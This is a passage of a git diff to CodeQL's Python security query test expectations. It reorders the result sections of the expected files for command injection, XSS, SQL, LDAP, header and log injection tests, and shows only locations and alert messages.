template construction depends on a $@. | JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | user-provided value | +| JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:21:25:21:32 | ControlFlowNode for template | This template construction depends on a $@. | JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected index 99941d47b288..563a0ac74aec 100644 --- a/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-078-CommandInjection-py2/CommandInjection.expected @@ -1,13 +1,3 @@ -#select -| command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | -| command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | edges | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:5:26:5:32 | ControlFlowNode for request | provenance | | | command_injection.py:5:26:5:32 | ControlFlowNode for request | command_injection.py:18:13:18:19 | ControlFlowNode for request | provenance | | @@ -40,3 +30,13 @@ nodes | command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | | command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | semmle.label | ControlFlowNode for BinaryExpr | subpaths +#select +| command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:19:15:19:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:20:15:20:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:21:15:21:27 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:23:20:23:32 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:25:19:25:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:26:19:26:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:27:19:27:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:28:19:28:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | +| command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | command_injection.py:29:19:29:31 | ControlFlowNode for BinaryExpr | This command line depends on a $@. | command_injection.py:5:26:5:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected index bf4f584c8157..d332231e0c99 100644 --- a/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected +++ b/python/ql/test/query-tests/Security/CWE-079-ReflectedXss/ReflectedXss.expected @@ -1,7 +1,3 @@ -#select -| reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | edges | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:2:26:2:32 | ControlFlowNode for request | provenance | | | reflected_xss.py:2:26:2:32 | ControlFlowNode for request | reflected_xss.py:9:18:9:24 | ControlFlowNode for request | provenance | | @@ -32,3 +28,7 @@ nodes | reflected_xss.py:27:23:27:29 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | subpaths +#select +| reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:10:26:10:53 | ControlFlowNode for BinaryExpr | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:22:26:22:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | reflected_xss.py:28:26:28:41 | ControlFlowNode for Attribute() | Cross-site scripting vulnerability due to a $@. | reflected_xss.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected index c1958c23858d..9ff8b1d718c1 100644 --- a/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-089-SqlInjection/SqlInjection.expected @@ -1,20 +1,3 @@ -#select -| sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | -| sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | edges | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | provenance | | | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | provenance | | @@ -52,3 +35,20 @@ nodes | sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | semmle.label | ControlFlowNode for username | | sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | semmle.label | ControlFlowNode for username | subpaths +#select +| sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:21:24:21:77 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:24:38:24:95 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:25:26:25:83 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | sql_injection.py:14:15:14:22 | ControlFlowNode for username | sql_injection.py:26:28:26:85 | ControlFlowNode for BinaryExpr | This SQL query depends on a $@. | sql_injection.py:14:15:14:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:27:28:27:87 | ControlFlowNode for Attribute() | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:31:50:31:72 | ControlFlowNode for Attribute() | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:41:26:41:33 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:42:31:42:38 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:43:30:43:37 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:44:35:44:42 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:45:41:45:48 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:46:46:46:53 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:47:47:47:54 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:48:52:48:59 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:50:18:50:25 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | +| sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | sqlalchemy_textclause.py:51:24:51:31 | ControlFlowNode for username | This SQL query depends on a $@. | sqlalchemy_textclause.py:23:15:23:22 | ControlFlowNode for username | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected index ae30a38acc32..20170029899e 100644 --- a/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-090-LdapInjection/LdapInjection.expected @@ -1,14 +1,3 @@ -#select -| ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | -| ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | edges | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:1:19:1:25 | ControlFlowNode for request | provenance | | | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:1:19:1:25 | ControlFlowNode for request | provenance | | @@ -119,3 +108,14 @@ nodes | ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | semmle.label | ControlFlowNode for dn | | ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | semmle.label | ControlFlowNode for search_filter | subpaths +#select +| ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:17:21:18 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:21:21:21:33 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:9:38:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap3_bad.py:38:13:38:25 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap3_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:9:21:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:21:33:21:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:9:37:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:37:33:37:45 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:9:55:10 | ControlFlowNode for dn | LDAP query parameter (DN) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | +| ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | ldap_bad.py:55:43:55:55 | ControlFlowNode for search_filter | LDAP query parameter (filter) depends on a $@. | ldap_bad.py:1:19:1:25 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected b/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected index 58f42bec0c84..e217064d1dfc 100644 --- a/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-113-HeaderInjection/Tests2-with-wsgi-validator/HeaderInjection.expected @@ -1,4 +1,4 @@ -#select edges nodes subpaths +#select diff --git a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected index 67274311bf42..fd9b5fe6bb65 100644 --- a/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-117-LogInjection/LogInjection.expected @@ -1,8 +1,3 @@ -#select -| LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:18:21:18:40 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | -| LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:24:18:24:37 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | -| LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:30:25:30:44 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | -| LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | LogInjectionBad.py:37:19:37:38 | ControlFlowNode for BinaryExpr | This log entry depends on a $@. | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember | user-provided value | edges | LogInjectionBad.py:7:19:7:25 | ControlFlowNode for ImportMember 